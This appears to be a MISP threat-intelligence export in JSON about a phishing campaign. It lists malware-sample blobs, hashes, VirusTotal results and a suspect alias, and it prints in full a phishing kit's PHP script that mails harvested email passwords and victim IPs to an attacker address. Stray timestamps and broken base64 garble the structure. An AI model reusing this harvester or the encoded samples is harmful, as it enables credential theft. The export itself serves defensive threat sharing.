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
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "malware-sample" ,
"timestamp" : "1558002051" ,
"to_ids" : true ,
"type" : "malware-sample" ,
"uuid" : "fcdd1546-c165-4934-bca4-0f7224d7fa73" ,
"value" : "f2676b94952018c220ee352b9857bc5ad62195b2d15cdfaf54fa5c5985d6934a|b830fd2997e1f124f34d77ff1fa9b89e"
} ,
{
"category" : "Artifacts dropped" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "mimetype" ,
"timestamp" : "1558002051" ,
"to_ids" : false ,
"type" : "mime-type" ,
"uuid" : "63a26d57-f6e6-40f9-855e-8ea50014271a" ,
"value" : "CDFV2 Microsoft Outlook Message"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "ssdeep" ,
"timestamp" : "1558002051" ,
"to_ids" : true ,
"type" : "ssdeep" ,
"uuid" : "ff15a2f4-029c-46cd-bc7c-42f97b51b7ea" ,
"value" : "12288:Yn4ijMb7m7MUeGApKWxw1RFn/68R4V6Sp22leUWd3F:Yn4iQUwQDkp6hdV"
}
]
} ,
{
"comment" : "Phishkit" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "17" ,
"timestamp" : "1558014735" ,
"uuid" : "5cdd5ff1-ed58-46d3-bed7-4bae950d210f" ,
"ObjectReference" : [
{
"comment" : "" ,
"object_uuid" : "5cdd5ff1-ed58-46d3-bed7-4bae950d210f" ,
"referenced_uuid" : "c3b36005-d35f-4540-bf78-cd09e2ac5e3d" ,
2023-04-21 13:25:09 +00:00
"relationship_type" : "analysed-with" ,
2023-12-14 14:30:15 +00:00
"timestamp" : "1621850122" ,
"uuid" : "5cdd65a9-7bf4-4105-b3b5-44f4950d210f"
} ,
{
"comment" : "" ,
"object_uuid" : "5cdd5ff1-ed58-46d3-bed7-4bae950d210f" ,
"referenced_uuid" : "5cdd62fc-c898-42fb-ad4d-4aac950d210f" ,
2023-04-21 13:25:09 +00:00
"relationship_type" : "contains" ,
2023-12-14 14:30:15 +00:00
"timestamp" : "1621850123" ,
"uuid" : "5cdd6a6b-f2fc-4706-b2b9-4b6b950d210f"
}
] ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"data" : " U E s D B B Q A C Q A I A J l o s E 5 o 9 A i Z Q O g 0 A G / K N Q A g A B w A Y j c y N D V i Z j Y 1 N 2 U 3 O T I z M j h h Y W F j Y m M 2 Z j c 1 Z D E 1 N T V V V A k A A / F f 3 V z x X 91 c d X g L A A E E I Q A A A A Q h A A A A U S G k G H x c 7 D i c f J L i M Q w A M n z w R e K 5 v + u c X 5 R / R i S L 4 x N Z M W R 5 s K K j m F w E Y c V 2 C X w W 7 O S q x d f x w p p b 7 i J L g b H F l K d m f N W L M z p h 9 C + K z X 2 Q o 5 J c H n q t t Z b 5 Y D f k / w z M K i c u K S S D Y 3 A M S 8 x j Q o V i R Y R w S K j w x g 7 + u S u + T b r Z + e e x 33 l 6 + 16 n A r f F l c 48 T M s K b U Z q y T V 7 t k / g p U R I H o o + N 8 U B d r n w U Q M e L B E n X h e 1 P k A a F P A 4 M C o 1 T l k b K B w x m O H K Y u H e a E Y o F k / E 2 / L R o E 3 h K r O V U O 2 n p R 56 f v Y G 5 C W W f C 649 R D h p U 17 U x 9 k e K p 83 J B I 0 F b 9 W Z x p + y t e k n A G Q 9 f c j Q t p f m t m F 0 W l y 4 y r o C I 8 z j 4 L 0 i K U 86 d s V t v 598 k v / q S Y 4 a w i F / F f 5 j S B i W 9 G i w B L Y 7 t V V 0 1 q Z a w m A L + u T 8 L c b u h 4 + R V 3 V 0 E v e X j z J F B n F 7 o r h A I 2 a G 41 D y U R Y / 756 k 4 J Z K 8 a i c F c d + T T X m C t E H v x J H S f j C E K n x B b 3 a v h 4 V p Z u Q 5 / H f E M P A a n N 0 9 W X H A G 2 o F M B R K J H O A E 7 h 7 l 35 A F U G 885 t E s e l 5 O 9 B j F s D y i a A y o q X V T Y O U C 7 x u O W v Y 1 B m f n O p / U Q R n N e V 6 u i D m D h p S o 6 L S + 3 o V S P 523 m e F Q b j h A e 4 n N f M X z k 4 G + f O F Q n Q 72 j F 8 W i T w Q k + r U R J z m N 0 T j A P A R w u z s Q a Q b D f W g d P b U K 95 j K n V I 5 P n j + 7 B 1 s a 7 L m + U J 6 S w q 9 b S x J 6 g x N 8 F g 3 Z L M h H B n D g D p v z a 3 a T 3 Y l W y 2 M 4 H a 5 w 9 O + 8 Z M B S f y E d A d L c v B z 0 n M x X k q 5 x W + R R f w z B X g 0 b / 0 h B l 1 b P 2 o w e O E L V V c v K v p T y A f U y d a K s G 42 L 4 y a S S T c o 55 r i v I Q B M S E h V J u x G 7 T 9 r M f g S W n G Z Z F j t G W R p R n 1 b / C 3 u 9 T o 5 M 0 L P L e j T R r d L G 2 J 4 + 7 U B s C Q e N l 1 / t E T C w x h b Q 0 R j h Z I f I 55 n N M u i 5 E m h 5 P J / F h O V o G A D P 2 i H j O Y h 6 K 8 / K 0 1 f Q 4 p 2 n / N 4 L D + C z f S o N h R t C + y V M m A T H f 3 t q h F 3 J a A a n b J 8 k s N d J L g Y u X M t p l a B 4 a a Z P U l Q V K I 1 s 6 + d Q k q 1 u P T m V D s S R O j z 7 H C H B t v m K z B X g Z I 5 + R A Q a o U u h y v C 3 S Q J J K 1 w 0 f 32 s v K 7 R z H K X 791 g T b H y B M 0 J E f o s X y c k Q T w 9 g L h W c j u I d e X 36 f i M B Y 0 H e Q i L F a n I y a 3 N e 2 J q l i 5 z M 4 I m V 5 u V m f k f 1 f 8 / W B y b X p 5 S S s 39 j Y S Q J I Q e I Z o l i F O X d C x y t z / j d o 4 A H m q g X 5 h c j Z H 1 s h 7 E y d o 10 w 4 / 3 m 3 l O v Y Z T H 5E2 D M h Q F 5 q f k U y a c o O X Q C M J i Z 1 C O I q E Q b z r g h P e J U P P 7 / A w C n f q P o W C 1 k l 6 Z b 8876 q 1 h n o i J K D D 476 + r 3 q z f j G y s G I p h c 5 z o n H M l Q Z R z o T U 41 s u 6 + / W d u W a l 76 v m S X z 8 Q a N q 2 Z 9 y j 6 k n T s s F h w a Q U T S p m D A y 3 e c E + F k 6 n h c R j v a V F M J f o g 5 S Y R y d N V 9 U n t K 2 C j G 2 n b C L 1 q 7 v C 4 M L + F b T x X G j H P Y R 3 d 6 d 8 X W k S w u 5 W I f Y 7 h g 1 r T + z T S N 1 u A l 3 z 1 q + s u f e j H k / m W p 2 q x J v m f d o A x q z V D B 9 K u O d c g p L N c r c U + t x P V u 6 I U u / L A J B o Y F P X N F w d f J x F x v U R T Z 8 G u y R D 7 r j E X j k a 8 O / f E l 5 / S 1 u B 1 O s M P a v m Y I + X t Z 3 Y O Y c l u N x V y x 9 D a Y B i H B b 8 / d 7 S I Y s g W r Q 2 u B a a a / m 4 j p h y 23 u X 3 S V A X b y z 0 7 Y B j i e z D Y Y x L 7 B l l E W i g / j r z 73 E U T m 2 b q U 7 A q T H E + u K P Y d N h 6 / Q V W l R 52 g m h e c 1 K o p K h w N k l h O + X o I K p O K 77 Z a 9 I 32 W T P a 8 K A D Y I 6 O 7 o T 9 e z 0 b V Z i O O E N D a q G y 8 B b j H u u 481 y q k l 6 a 8 m F t w w U h h 3 X B L 33 G T 5 S 5 n 5 r N B n 8 g N W r 0 G W L 0 B K 8 W I t d W M i y Y i F t 7 F O H I T c 9 J N h d k 8 i E L J z x B f M T 8 V m B B q k z I q r T o W T Y a B 3 j 2 P 7 x t 9 s o s 8 R m H R m 2 D 60 B Q t j W D k l J Z O f 5 U A Y d y x 9 S d A z B o O I U 6 j O i m K H J d Z o j d 1 O 0 Q V e 25 x 1 X D / d h p L I 3 P 1 c 4 Q C f n 1 M 8 s 9 q f 31 c t p 8 I / 3 O R B q q c E m 66 c C i V G J Y 7 H P M i H O + Y S f R u F 0 / k c q l L K a + Y f Y p u u N x V 8 c 4 k q E s X X 7 r C 6 k b K j 6 c M 64 F / l Q k c Q 2 / o u k f o q s i 5 y r S 9 U E O a M R / 9 d M x q c L D f E A i x L T g C e i 1 j Z H T u m J q E l a Y c 0 v j 76 E a b H V B o D j + c l K P G V + S 6 d G F J 4 s G 6 S P 46 j A l d 1 d 2 c x h I E j 32 X v 0 U 4 T 7 Z y L 61 s / e G R 5 P 76 F U T Q I 1 K i + 1 S 1 H W n r S 7 x w P W / C y Y 8 d 99 c x Y X N V T b M + I R f u Q E A U X P F P l 473 g N J + h r / m N u d W A A 27 I 0 p 1 K k m K Q g X j X j O 5 u W A H A M m K l p F o k 265 Q H g E / 4 J b R l F B 4 D z 3 j + q c e E 13 W 4 A v 9 o U C O u b 2 I N E y 9 o h p X 89 u b I J J S H G w H M 2 S o Z x 0 c S u j Y Y L c a / l k U O / j M p U 1 d q 2 T B T 7 N n z q b f 5 M H + S V Q d G + f k J l A P 0 b s T x B 93 I P R 4 Z P c 3 G J X j r O H b / W q C k z Z k A 5 o j 89 T R X 0 h I q J c C 1 b L U H c q H N f Y G T 4 q G E e o F V B o L T X q l G O L l 7 p x p 6 W z B J f H 62 T M v c Z j C F Y b z T E u I 7 C s p l 903 k g y y B j f / m x s 76 F 30 t r f e l w 4 X X J z u g C V Q z x o K s l 2 r s q 2 N d c m o A G T R p E + q u 0 X G N V 9 q G P 7 Q y c i p O 0 1 k O f m 4 J L e 6 X 8 H Q C u y j f G R r g C d 0e8 r j F v D p r D t W j x S R r C z 9 k 9 K x g S N s v P e q + 7 F F i o F B w R r s g 629 V G J s Q O G W 3 q L v W w Q f y a D T 3 D Q 6 T L m V m 8 D 19 Z 0 Q y 5 w 4 u 8 a L w k X R / T i e + 2 F O n W E W E l a q Z 7 C r F h / x Z R z d A 2 q / 0 x n j E K k 4 x 7 u 21 J v T 7 k x N b g p 8 Z v P d w R N Y O M 4 f i U Z H e k d 22 g z 7 a L l i K j Q h i s g J A V k / f y J K L J G 0 f U p Y J T I F T 8 B c Y u k H r I W b I Y C j 612 o n i 6 E B e e O Y D 8e1 a 6 V b + P J 1 d a A V y b + Y D U U s f A N 1 H G f L o L V q Y U d x q s D a y 7 Y E H P r L D 6 A K s s P E k 7 I C V R 4 S H u j V B j 7 B p Y b S 3 d t o e P Q N y J 9 t g w R 9 y f o q + W e p 1 U 5 G t 1 q V + G 5 h B f l Q Y X x k K b r p j I U f C g o l K W x s o e X C B 0 9 e K 67 e z 65 C / t s I t K p 0 k l Q 7 C Q e k / 2 x n 9 J r D U M f H 9 m p w 0 N a b 2 P b E 0 + G j i y f g v N N M I f R q f B M P 7 S / 3 N h K N 9 L 0 U W R l c G D E Z G B v B D x p p 6 J H C 0 d P S 4e4 P o j 5 z B 2 e r M k q I n 6 y c 8 z 9 O z L U E W Y 3 E D c R m x W g 2 z e s I + a x I e y k k o 1 K L + Z m c c 80 r A 6 u v r T Y y d n Z h x 7 L 0 8 D s U W M 2 a n u U + N C z 6 I V d S s 5 / 6 f 5 w d q j m y V 697 H W V I d 0 D y L m r a e i R c + F 7 N Z A 7 W 1 I D Y t s J A E l u n t J l h 6 / b M X H H t 3 o H B 3 w + x H t W o m A P j Z i h 1 P M 58 U Z f 4 h y g 9 Y n 2 y r F p 0 D X n L Q m e U B 9 O X b X / h Q z W Y r w t Z j d R Y J F m 1 n 1 j D w m K g o u w y R W / l X 7 k U a e f t a N e N L Q r p q d E S f u M q 5 C v Q n x N q P Y a 6 S j y E i T 8 I B l v F t 8 Q O y K u 2 E k 8 E P 81 y n a Y / N y P X + U N H 3 R m u d p p / f c G z 9 b J N U O 1 t x V u 47 N + A B p o 5 W G / 4 X o m 8 / X A 2 K w n X 3 e y l 8 L n u L W s e t 4 r l k L k X O e S y s Q D y 5 h g M G s 2 k r o J 3 d y u b P + Z l s K l V R A J l w f i D a F E 3 y e k G j E k H e i g m y t 5 L 1 A h O u k d b h t G e r G B u q x E j A u / 4 V Y T E B P 5 o G Q 82 b b o Y I A 3757 p U 1 v K z / h M g u n L Q p J m / V v u w Z 2 K V N d s I L c G 3 x 2 t k z M e h P y N f R C d P U G d e 6 a W J J S s x 0 g W w A t r h S I 335 + 6 F D w m n Z i 3 H M 9 E a l i n K g K R g m q e 4 w U c i 5 J j + 7 P Q 9 p S x p Q 2 w h 112 P r Y t O e t F j E o r z m h 9 J Q U g Y y I k 6 i j H B g y m k B C H u H c p T X k l T v h 6 s 782 a w D d 5 e L w E E g 1 a k c L h O z N r s s g 799 m h w m Q s A r Y T x o v l k T v D t w Z P k m q J v + U x c 0 1 f d u t z M / p H a d F s Q + 0 w 6 u 8 x 0 e R p 3E0 b Z 81 O f X D Y p S H N V H f i k P r 5 n
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "malware-sample" ,
"timestamp" : "1558014735" ,
"to_ids" : true ,
"type" : "malware-sample" ,
"uuid" : "5cdd5ff2-7094-4482-bff5-414e950d210f" ,
"value" : "New-Updated-docs.zip|b7245bf657e792328aaacbc6f75d1555"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "filename" ,
"timestamp" : "1558014735" ,
"to_ids" : false ,
"type" : "filename" ,
"uuid" : "5cdd5ff2-fafc-4118-96bf-4ee1950d210f" ,
"value" : "New-Updated-docs.zip"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1558014735" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "5cdd5ff2-8a60-4e75-9d34-4166950d210f" ,
"value" : "b7245bf657e792328aaacbc6f75d1555"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha1" ,
"timestamp" : "1558014735" ,
"to_ids" : true ,
"type" : "sha1" ,
"uuid" : "5cdd5ff2-7a30-4dd6-911d-4429950d210f" ,
"value" : "bc32ff3213011db8278bfcd21b1dc432ded499d3"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha256" ,
"timestamp" : "1558014735" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "5cdd5ff2-8570-47ba-833d-4cba950d210f" ,
"value" : "9c4f9755fc183f6ad4ad4d600a0a3ed9230900152245f924b9106202ce543c58"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "size-in-bytes" ,
"timestamp" : "1558014735" ,
"to_ids" : false ,
"type" : "size-in-bytes" ,
"uuid" : "5cdd5ff2-23f4-47f6-865c-42f0950d210f" ,
"value" : "3525231"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "file-encoding" ,
"timestamp" : "1558014736" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "5cdd6b10-7f58-4ab6-918f-41c0950d210f" ,
"value" : "Adobe-Standard-Encoding"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "state" ,
"timestamp" : "1558014736" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "5cdd6b10-3178-496d-a688-4aeb950d210f" ,
"value" : "Malicious"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "An object which describes a person or an identity." ,
"meta-category" : "misc" ,
"name" : "person" ,
"template_uuid" : "a15b0477-e9d1-4b9c-9546-abe78a4f4248" ,
"template_version" : "9" ,
"timestamp" : "1558014225" ,
"uuid" : "5cdd6190-8c08-46ef-b523-4da2950d210f" ,
"ObjectReference" : [
{
"comment" : "" ,
"object_uuid" : "5cdd6190-8c08-46ef-b523-4da2950d210f" ,
"referenced_uuid" : "5cdd5b25-5624-4404-b507-c170950d210f" ,
2023-04-21 13:25:09 +00:00
"relationship_type" : "owner-of" ,
2023-12-14 14:30:15 +00:00
"timestamp" : "1621850123" ,
"uuid" : "5cdd61b1-6ba4-431f-ba4e-4649950d210f"
} ,
{
"comment" : "" ,
"object_uuid" : "5cdd6190-8c08-46ef-b523-4da2950d210f" ,
"referenced_uuid" : "5cdd62fc-c898-42fb-ad4d-4aac950d210f" ,
2023-04-21 13:25:09 +00:00
"relationship_type" : "contained-within" ,
2023-12-14 14:30:15 +00:00
"timestamp" : "1621850123" ,
"uuid" : "5cdd6334-2694-4968-b0e7-4c59950d210f"
} ,
{
"comment" : "" ,
"object_uuid" : "5cdd6190-8c08-46ef-b523-4da2950d210f" ,
"referenced_uuid" : "5cdd63dc-ab44-4ab7-be4b-4aa1950d210f" ,
2023-04-21 13:25:09 +00:00
"relationship_type" : "targets" ,
2023-12-14 14:30:15 +00:00
"timestamp" : "1621850123" ,
"uuid" : "5cdd63f3-643c-4933-8938-4ecb950d210f"
} ,
{
"comment" : "" ,
"object_uuid" : "5cdd6190-8c08-46ef-b523-4da2950d210f" ,
"referenced_uuid" : "5cdd63dc-0b30-404e-a1c4-4479950d210f" ,
2023-04-21 13:25:09 +00:00
"relationship_type" : "targets" ,
2023-12-14 14:30:15 +00:00
"timestamp" : "1621850123" ,
"uuid" : "5cdd6408-6910-40e2-84fc-43bb950d210f"
} ,
{
"comment" : "" ,
"object_uuid" : "5cdd6190-8c08-46ef-b523-4da2950d210f" ,
"referenced_uuid" : "5cdd63dc-0e48-4b97-bb9e-43ff950d210f" ,
2023-04-21 13:25:09 +00:00
"relationship_type" : "targets" ,
2023-12-14 14:30:15 +00:00
"timestamp" : "1621850123" ,
"uuid" : "5cdd642c-37d8-4c86-aab8-4f18950d210f"
} ,
{
"comment" : "" ,
"object_uuid" : "5cdd6190-8c08-46ef-b523-4da2950d210f" ,
"referenced_uuid" : "5cdd63dc-713c-4eb6-adf5-4f3e950d210f" ,
2023-04-21 13:25:09 +00:00
"relationship_type" : "targets" ,
2023-12-14 14:30:15 +00:00
"timestamp" : "1621850123" ,
"uuid" : "5cdd644c-4954-4a77-b04c-478e950d210f"
} ,
{
"comment" : "" ,
"object_uuid" : "5cdd6190-8c08-46ef-b523-4da2950d210f" ,
"referenced_uuid" : "5cdd63dc-b678-4fae-bd00-4390950d210f" ,
2023-04-21 13:25:09 +00:00
"relationship_type" : "targets" ,
2023-12-14 14:30:15 +00:00
"timestamp" : "1621850123" ,
"uuid" : "5cdd6460-2e20-481c-822c-47fc950d210f"
} ,
{
"comment" : "" ,
"object_uuid" : "5cdd6190-8c08-46ef-b523-4da2950d210f" ,
"referenced_uuid" : "5cdd63dc-29ec-42c0-936b-4d9d950d210f" ,
2023-04-21 13:25:09 +00:00
"relationship_type" : "targets" ,
2023-12-14 14:30:15 +00:00
"timestamp" : "1621850123" ,
"uuid" : "5cdd647d-61a4-4cc6-b0ca-490b950d210f"
} ,
{
"comment" : "" ,
"object_uuid" : "5cdd6190-8c08-46ef-b523-4da2950d210f" ,
"referenced_uuid" : "5cdd683b-6530-4b0d-a8de-40c1950d210f" ,
2023-04-21 13:25:09 +00:00
"relationship_type" : "abuses" ,
2023-12-14 14:30:15 +00:00
"timestamp" : "1621850123" ,
"uuid" : "5cdd689d-bc70-4a8c-86a0-4524950d210f"
} ,
{
"comment" : "" ,
"object_uuid" : "5cdd6190-8c08-46ef-b523-4da2950d210f" ,
"referenced_uuid" : "5cdd683b-6530-4b0d-a8de-40c1950d210f" ,
2023-04-21 13:25:09 +00:00
"relationship_type" : "targets" ,
2023-12-14 14:30:15 +00:00
"timestamp" : "1621850123" ,
"uuid" : "5cdd6911-4c64-424f-b6d2-45dd950d210f"
}
] ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "role" ,
"timestamp" : "1558012304" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "5cdd6190-8d2c-4bc1-a932-4fd4950d210f" ,
"value" : "Suspect"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "alias" ,
"timestamp" : "1558012304" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "5cdd6190-d518-4fb8-8401-450c950d210f" ,
"value" : "JATBOSS"
} ,
{
"category" : "Person" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "gender" ,
"timestamp" : "1558012304" ,
"to_ids" : false ,
"type" : "gender" ,
"uuid" : "5cdd6190-bea0-4a00-b93f-4488950d210f" ,
"value" : "Prefer not to say"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "Object describing a computer program written to be run in a special run-time environment. The script or shell script can be used for malicious activities but also as support tools for threat analysts." ,
"meta-category" : "misc" ,
"name" : "script" ,
"template_uuid" : "6bce7d01-dbec-4054-b3c2-3655a19382e2" ,
"template_version" : "3" ,
"timestamp" : "1558012668" ,
"uuid" : "5cdd62fc-c898-42fb-ad4d-4aac950d210f" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "script" ,
"timestamp" : "1558012668" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "5cdd62fc-4dc0-4a95-ba2b-4e21950d210f" ,
"value" : "<?php\r\nif(isset($_SERVER['HTTP_X_REAL_IP'])){\r\n$ip = $_SERVER['HTTP_X_REAL_IP'];\r\n}else{\r\n$ip=$_SERVER['REMOTE_ADDR'];\r\n}\r\n$message .= \"|----------| E M A I L |--------------|\\n\";\r\n$message .= \"Online: \".$_POST['email'].\"\\n\";\r\n$message .= \"pass: \".$_POST['pwd'].\"\\n\";\r\n$message .= \"|--------------- I N F O | I P -------------------|\\n\";\r\n$message .= \"|Client IP: \".$ip.\"\\n\";\r\n$message .= \"|--- http://www.geoiptool.com/?IP=$ip ----\\n\";\r\n$message .= \"User Agent : \".$useragent.\"\\n\";\r\n$message .= \"|----------- HACKED BY JATBOSS --------------|\\n\";\r\n$send = \"jatboss6@gmail.com\";\r\n$subject = \"$country | $ip\";\r\n{\r\nmail(\"$send\", \"$subject\", $message); \r\n}\r\n\r\n\r\n?>"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "language" ,
"timestamp" : "1558012668" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "5cdd62fc-e698-486a-b877-4563950d210f" ,
"value" : "PHP"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "filename" ,
"timestamp" : "1558012668" ,
"to_ids" : true ,
"type" : "filename" ,
"uuid" : "5cdd62fc-8010-4377-97b3-46ae950d210f" ,
"value" : "sendmail.php"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "state" ,
"timestamp" : "1558012668" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "5cdd62fc-0494-426e-96d5-4de9950d210f" ,
"value" : "Malicious"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "VirusTotal report" ,
"meta-category" : "misc" ,
"name" : "virustotal-report" ,
"template_uuid" : "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4" ,
"template_version" : "2" ,
"timestamp" : "1558013351" ,
"uuid" : "d9bdc42c-191f-49a2-8cbe-2604f5462df6" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "last-submission" ,
"timestamp" : "1558002051" ,
"to_ids" : false ,
"type" : "datetime" ,
"uuid" : "f1c90675-0c32-40f1-af8f-f90a06993120" ,
"value" : "2019-05-16T08:54:33"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "permalink" ,
"timestamp" : "1558002051" ,
"to_ids" : false ,
"type" : "link" ,
"uuid" : "f8eb37d5-1ef7-4e7c-b97c-7fcab9d7e00e" ,
"value" : "https://www.virustotal.com/file/f2676b94952018c220ee352b9857bc5ad62195b2d15cdfaf54fa5c5985d6934a/analysis/1557996873/"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "detection-ratio" ,
"timestamp" : "1558002051" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "fb7fe45e-a16c-44c4-9a4b-7b6b0018fd43" ,
"value" : "1/56"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "VirusTotal report" ,
"meta-category" : "misc" ,
"name" : "virustotal-report" ,
"template_uuid" : "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4" ,
"template_version" : "2" ,
"timestamp" : "1558013351" ,
"uuid" : "dcd9ca51-3194-44ee-86a2-5f0cf9b923f8" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "last-submission" ,
"timestamp" : "1558002047" ,
"to_ids" : false ,
"type" : "datetime" ,
"uuid" : "ac5c453a-e980-47a2-9a84-5d37cf392471" ,
"value" : "2019-05-13T02:37:30"
} ,
{
"category" : "Payload delivery" ,
